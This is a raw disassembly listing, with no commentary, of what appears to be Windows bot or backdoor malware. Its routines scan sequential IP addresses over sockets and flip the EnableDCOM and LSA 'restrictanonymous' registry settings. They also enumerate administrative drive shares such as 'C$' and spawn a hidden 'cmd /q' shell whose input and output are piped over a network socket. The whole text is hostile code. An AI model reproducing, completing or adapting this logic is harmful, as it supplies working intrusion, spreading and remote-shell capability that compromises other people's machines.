push [ebp+var_34]
call ds:dword_436468 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call ds:dword_4364E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_414296
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_436410 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov ds:dword_43BECC[ecx], esi
jz short loc_414296
push [ebp+var_34]
push [ebp+var_28]
call ds:dword_4364F4 ; inet_ntoa
push eax
mov edi, offset dword_4C8E54
push offset unk_42E9EC
push edi
call sub_415480
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_40BAE7
push edi
call sub_40A5B3
add esp, 28h
loc_414296: ; CODE XREF: sub_4141D8+5D�j
; sub_4141D8+7E�j
push esi
call ds:dword_436500 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_4141D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4142A5 proc near ; DATA XREF: sub_40D2E0+35E0�o
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_422054
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_4142D3: ; CODE XREF: sub_4142A5+EC�j
push [ebp+var_2C]
push [ebp+var_20]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_42EA24
push eax
call sub_415480
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_43BCC0
push eax
call sub_416D30
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_4141D8
push edi
push edi
call ds:dword_422070 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_41433F
loc_414334: ; CODE XREF: sub_4142A5+98�j
cmp [ebp+var_C], edi
jnz short loc_41433F
push 32h
call esi ; Sleep
jmp short loc_414334
; ---------------------------------------------------------------------------
loc_41433F: ; CODE XREF: sub_4142A5+8D�j
; sub_4142A5+92�j
push [ebp+var_4]
call ds:off_422074
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_415560
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_43639C ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_436464 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_415560
add esp, 0Ch
jmp loc_4142D3
sub_4142A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414396 proc near ; DATA XREF: sub_40D2E0+5F4F�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_4143DD
call sub_4143F6
jmp short loc_4143E2
; ---------------------------------------------------------------------------
loc_4143DD: ; CODE XREF: sub_414396+3E�j
call sub_41471A
loc_4143E2: ; CODE XREF: sub_414396+45�j
add esp, 10h
push [ebp+var_14]
call sub_415248
pop ecx
push 0
call ds:dword_422044 ; ExitThread
sub_414396 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143F6 proc near ; CODE XREF: sub_414396+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp ds:dword_436538, edi
jnz loc_414528
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_4364D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_414481
mov ax, ds:word_42EDD4
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_43648C ; RegSetValueExA
test eax, eax
jz short loc_414463
push offset unk_42ED94
jmp short loc_414468
; ---------------------------------------------------------------------------
loc_414463: ; CODE XREF: sub_4143F6+64�j
push offset dword_42ED68
loc_414468: ; CODE XREF: sub_4143F6+6B�j
lea eax, [ebp+var_214]
push eax
call sub_415480
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_436444 ; RegCloseKey
jmp short loc_414494
; ---------------------------------------------------------------------------
loc_414481: ; CODE XREF: sub_4143F6+36�j
lea eax, [ebp+var_214]
push offset unk_42ED28
push eax
call sub_415480
pop ecx
pop ecx
loc_414494: ; CODE XREF: sub_4143F6+89�j
cmp [ebp+arg_C], edi
jnz short loc_4144B3
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_4144B3: ; CODE XREF: sub_4143F6+A1�j
lea eax, [ebp+var_214]
push eax
call sub_40A5B3
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_4364D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_414521
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call ds:dword_43648C ; RegSetValueExA
test eax, eax
jz short loc_414503
push offset unk_42ECC8
jmp short loc_414508
; ---------------------------------------------------------------------------
loc_414503: ; CODE XREF: sub_4143F6+104�j
push offset unk_42EC84
loc_414508: ; CODE XREF: sub_4143F6+10B�j
lea eax, [ebp+var_214]
push eax
call sub_415480
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_436444 ; RegCloseKey
jmp short loc_41453B
; ---------------------------------------------------------------------------
loc_414521: ; CODE XREF: sub_4143F6+E2�j
push offset unk_42EC38
jmp short loc_41452D
; ---------------------------------------------------------------------------
loc_414528: ; CODE XREF: sub_4143F6+13�j
push offset unk_42EBF8
loc_41452D: ; CODE XREF: sub_4143F6+130�j
lea eax, [ebp+var_214]
push eax
call sub_415480
pop ecx
pop ecx
loc_41453B: ; CODE XREF: sub_4143F6+129�j
cmp [ebp+arg_C], edi
jnz short loc_41455A
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_41455A: ; CODE XREF: sub_4143F6+148�j
lea eax, [ebp+var_214]
push eax
call sub_40A5B3
cmp ds:dword_436560, edi
pop ecx
jnz loc_4146D5
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41457D: ; CODE XREF: sub_4143F6+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call ds:dword_4363B4
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41461A
cmp eax, 0EAh
jz short loc_41461A
mov esi, offset off_42EA60
loc_4145AE: ; CODE XREF: sub_4143F6+21D�j
push dword ptr [esi]
push edi
call sub_40C131
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_4145C5
push offset unk_42EBC4
jmp short loc_4145CA
; ---------------------------------------------------------------------------
loc_4145C5: ; CODE XREF: sub_4143F6+1C6�j
push offset unk_42EB88
loc_4145CA: ; CODE XREF: sub_4143F6+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_4159FA
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_4145FD
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_4145FD: ; CODE XREF: sub_4143F6+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_40A5B3
add esi, 8
pop ecx
cmp esi, offset dword_42EA80
jb short loc_4145AE
jmp loc_4146B2
; ---------------------------------------------------------------------------
loc_41461A: ; CODE XREF: sub_4143F6+1AA�j
; sub_4143F6+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_4146A9
loc_414629: ; CODE XREF: sub_4143F6+2AF�j
mov edi, [esi]
push edi
call sub_417ABC
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41469E
push edi
call sub_40C01E
push eax
push 0
call sub_40C131
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_414658
push offset unk_42EB54
jmp short loc_41465D
; ---------------------------------------------------------------------------
loc_414658: ; CODE XREF: sub_4143F6+259�j
push offset unk_42EB18
loc_41465D: ; CODE XREF: sub_4143F6+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_4159FA
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_414691
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_414691: ; CODE XREF: sub_4143F6+27F�j
lea eax, [ebp+var_214]
push eax
call sub_40A5B3
pop ecx
loc_41469E: ; CODE XREF: sub_4143F6+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_414629
xor edi, edi
loc_4146A9: ; CODE XREF: sub_4143F6+22D�j
push [ebp+var_8]
call ds:dword_4364F8
loc_4146B2: ; CODE XREF: sub_4143F6+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41457D
lea eax, [ebp+var_214]
push offset unk_42EAE0
push eax
call sub_415480
pop ecx
pop ecx
pop ebx
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146D5: ; CODE XREF: sub_4143F6+177�j
lea eax, [ebp+var_214]
push offset unk_42EAA0
push eax
call sub_415480
pop ecx
pop ecx
loc_4146E8: ; CODE XREF: sub_4143F6+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_414706
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_414706: ; CODE XREF: sub_4143F6+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_40A5B3
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_4143F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41471A proc near ; CODE XREF: sub_414396:loc_4143DD�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp ds:dword_436538, ebx
push esi
jnz loc_414848
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_4364D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_4147A5
mov ax, ds:word_42EFBC
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_43648C ; RegSetValueExA
test eax, eax
jz short loc_414787
push offset unk_42EF88
jmp short loc_41478C
; ---------------------------------------------------------------------------
loc_414787: ; CODE XREF: sub_41471A+64�j
push offset dword_42EF5C
loc_41478C: ; CODE XREF: sub_41471A+6B�j
lea eax, [ebp+var_220]
push eax
call sub_415480
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_436444 ; RegCloseKey
jmp short loc_4147B8
; ---------------------------------------------------------------------------
loc_4147A5: ; CODE XREF: sub_41471A+36�j
lea eax, [ebp+var_220]
push offset unk_42ED28
push eax
call sub_415480
pop ecx
pop ecx
loc_4147B8: ; CODE XREF: sub_41471A+89�j
cmp [ebp+arg_C], ebx
jnz short loc_4147D7
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_4147D7: ; CODE XREF: sub_41471A+A1�j
lea eax, [ebp+var_220]
push eax
call sub_40A5B3
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_4364D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_414841
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call ds:dword_43648C ; RegSetValueExA
test eax, eax
jz short loc_414823
push offset unk_42EF10
jmp short loc_414828
; ---------------------------------------------------------------------------
loc_414823: ; CODE XREF: sub_41471A+100�j
push offset unk_42EECC
loc_414828: ; CODE XREF: sub_41471A+107�j
lea eax, [ebp+var_220]
push eax
call sub_415480
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_436444 ; RegCloseKey
jmp short loc_41485B
; ---------------------------------------------------------------------------
loc_414841: ; CODE XREF: sub_41471A+E2�j
push offset unk_42EE80
jmp short loc_41484D
; ---------------------------------------------------------------------------
loc_414848: ; CODE XREF: sub_41471A+13�j
push offset unk_42EBF8
loc_41484D: ; CODE XREF: sub_41471A+12C�j
lea eax, [ebp+var_220]
push eax
call sub_415480
pop ecx
pop ecx
loc_41485B: ; CODE XREF: sub_41471A+125�j
cmp [ebp+arg_C], ebx
jnz short loc_41487A
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_41487A: ; CODE XREF: sub_41471A+144�j
lea eax, [ebp+var_220]
push eax
call sub_40A5B3
cmp ds:dword_436560, ebx
pop ecx
jnz loc_4149EF
push edi
mov esi, offset off_42EA60
mov edi, 200h
loc_41489E: ; CODE XREF: sub_41471A+1E9�j
push dword ptr [esi+4]
push dword ptr [esi]
push ebx
call sub_40C085
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_4148B9
push offset unk_42EE50
jmp short loc_4148BE
; ---------------------------------------------------------------------------
loc_4148B9: ; CODE XREF: sub_41471A+196�j
push offset unk_42EE18
loc_4148BE: ; CODE XREF: sub_41471A+19D�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_4159FA
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_4148ED
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_4148ED: ; CODE XREF: sub_41471A+1B7�j
lea eax, [ebp+var_220]
push eax
call sub_40A5B3
add esi, 8
pop ecx
cmp esi, offset off_42EA70
jb short loc_41489E
call ds:dword_422164 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_4149D7
loc_414918: ; CODE XREF: sub_41471A+2B7�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_4149CC
cmp bl, 41h
jz loc_4149CC
movsx esi, bl
push esi
push offset aC_2 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_1 ; "%c:\\"
push 0Ah
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_20]
push eax
call ds:dword_4364C8 ; GetDriveTypeA
cmp eax, 3
jnz short loc_4149CC
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_40C085
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41498A
push offset unk_42EE50
jmp short loc_41498F
; ---------------------------------------------------------------------------
loc_41498A: ; CODE XREF: sub_41471A+267�j
push offset unk_42EE18
loc_41498F: ; CODE XREF: sub_41471A+26E�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_4159FA
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4149BF
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_4149BF: ; CODE XREF: sub_41471A+289�j
lea eax, [ebp+var_220]
push eax
call sub_40A5B3
pop ecx
loc_4149CC: ; CODE XREF: sub_41471A+206�j
; sub_41471A+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_414918
loc_4149D7: ; CODE XREF: sub_41471A+1F8�j
lea eax, [ebp+var_220]
push offset unk_42EDD8
push eax
call sub_415480
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_414A02
; ---------------------------------------------------------------------------
loc_4149EF: ; CODE XREF: sub_41471A+173�j
lea eax, [ebp+var_220]
push offset unk_42EAA0
push eax
call sub_415480
pop ecx
pop ecx
loc_414A02: ; CODE XREF: sub_41471A+2D3�j
cmp [ebp+arg_C], ebx
jnz short loc_414A20
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_414A20: ; CODE XREF: sub_41471A+2EB�j
lea eax, [ebp+var_220]
push eax
call sub_40A5B3
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_41471A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A34 proc near ; CODE XREF: sub_4138EE+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_414B85
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, ds:dword_43BECC[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_422070
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_414D57
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_414A9F
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42F004
call sub_40A627
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_414AD9
; ---------------------------------------------------------------------------
loc_414A9F: ; CODE XREF: sub_414A34+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_414E09
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_414AE0
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42F004
call sub_40A627
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_422150 ; TerminateThread
loc_414AD9: ; CODE XREF: sub_414A34+69�j
xor eax, eax
jmp loc_414B80
; ---------------------------------------------------------------------------
loc_414AE0: ; CODE XREF: sub_414A34+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_422168 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_414B3A
dec eax
jz short loc_414B34
dec eax
jz short loc_414B20
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42EFC0
call sub_40A627
pop ecx
pop ecx
jmp short loc_414B4F
; ---------------------------------------------------------------------------
loc_414B20: ; CODE XREF: sub_414A34+D5�j
mov edi, ds:dword_422150
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_414B4F
; ---------------------------------------------------------------------------
loc_414B34: ; CODE XREF: sub_414A34+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_414B3E
; ---------------------------------------------------------------------------
loc_414B3A: ; CODE XREF: sub_414A34+CF�j
push ebx
push dword ptr [esi+14h]
loc_414B3E: ; CODE XREF: sub_414A34+104�j
call ds:dword_422150 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_422158 ; TerminateProcess
loc_414B4F: ; CODE XREF: sub_414A34+EA�j
; sub_414A34+FE�j
push dword ptr [esi+10h]
mov edi, ds:off_422074
call edi ; sub_4DB3D5
push dword ptr [esi+14h]
call edi ; sub_4DB3D5
push dword ptr [esi+8]
call edi ; sub_4DB3D5
push dword ptr [esi]
call edi ; sub_4DB3D5
push dword ptr [esi+4]
call edi ; sub_4DB3D5
push dword ptr [esi+0Ch]
call ds:dword_436500 ; closesocket
push esi
call sub_415DE1
pop ecx
push 1
pop eax
loc_414B80: ; CODE XREF: sub_414A34+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_414A34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414B85 proc near ; CODE XREF: sub_414A34+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_415D2F
mov esi, eax
pop ecx
cmp esi, edi
jz loc_414C6F
mov ebx, ds:dword_422120
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:off_422074
test eax, eax
jnz short loc_414BE8
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42F0E4
jmp short loc_414C08
; ---------------------------------------------------------------------------
loc_414BE8: ; CODE XREF: sub_414B85+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_414C10
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42F094
loc_414C08: ; CODE XREF: sub_414B85+61�j
call sub_40A627
pop ecx
jmp short loc_414C3E
; ---------------------------------------------------------------------------
loc_414C10: ; CODE XREF: sub_414B85+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_414C7E
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; sub_4DB3D5
push [ebp+var_8]
call edi ; sub_4DB3D5
cmp dword ptr [esi+8], 0
jnz short loc_414C73
push offset dword_42F05C
call sub_40A5B3
loc_414C3E: ; CODE XREF: sub_414B85+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_414C4A
push [ebp+var_4]
call edi ; sub_4DB3D5
loc_414C4A: ; CODE XREF: sub_414B85+BE�j
cmp [ebp+var_8], 0
jz short loc_414C55
push [ebp+var_8]
call edi ; sub_4DB3D5
loc_414C55: ; CODE XREF: sub_414B85+C9�j
mov eax, [esi]
test eax, eax
jz short loc_414C5E
push eax
call edi ; sub_4DB3D5
loc_414C5E: ; CODE XREF: sub_414B85+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_414C68
push eax
call edi ; sub_4DB3D5
loc_414C68: ; CODE XREF: sub_414B85+DE�j
push esi
call sub_415DE1
pop ecx
loc_414C6F: ; CODE XREF: sub_414B85+1D�j
xor eax, eax
jmp short loc_414C79
; ---------------------------------------------------------------------------
loc_414C73: ; CODE XREF: sub_414B85+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_414C79: ; CODE XREF: sub_414B85+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_414B85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C7E proc near ; CODE XREF: sub_414B85+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_415500
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_415500
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_42211C
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_422118 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_422104 ; CreateProcessA
test eax, eax
jz short loc_414D3A
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov ds:dword_43BEC8[eax], ecx
call ds:off_422074
jmp short loc_414D50
; ---------------------------------------------------------------------------
loc_414D3A: ; CODE XREF: sub_414C7E+9A�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42F134
call sub_40A627
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_414D50: ; CODE XREF: sub_414C7E+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_414C7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414D57 proc near ; DATA XREF: sub_414A34+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:off_422098
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_414D80: ; CODE XREF: sub_414D57+8F�j
call ebx ; sub_4DB3FC
test eax, eax
jz short loc_414DE8
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_414DBB
loc_414D91: ; CODE XREF: sub_414D57+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_414DAB
cmp dl, 0Dh
jz short loc_414DAB
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_414DAB: ; CODE XREF: sub_414D57+44�j
; sub_414D57+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_414D91
loc_414DBB: ; CODE XREF: sub_414D57+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call ds:dword_4364B8 ; send
test eax, eax
jle short loc_414DE8
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_414D80
; ---------------------------------------------------------------------------
loc_414DE8: ; CODE XREF: sub_414D57+2D�j
; sub_414D57+79�j
mov esi, ds:dword_42206C
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_414E04
call esi ; RtlGetLastWin32Error
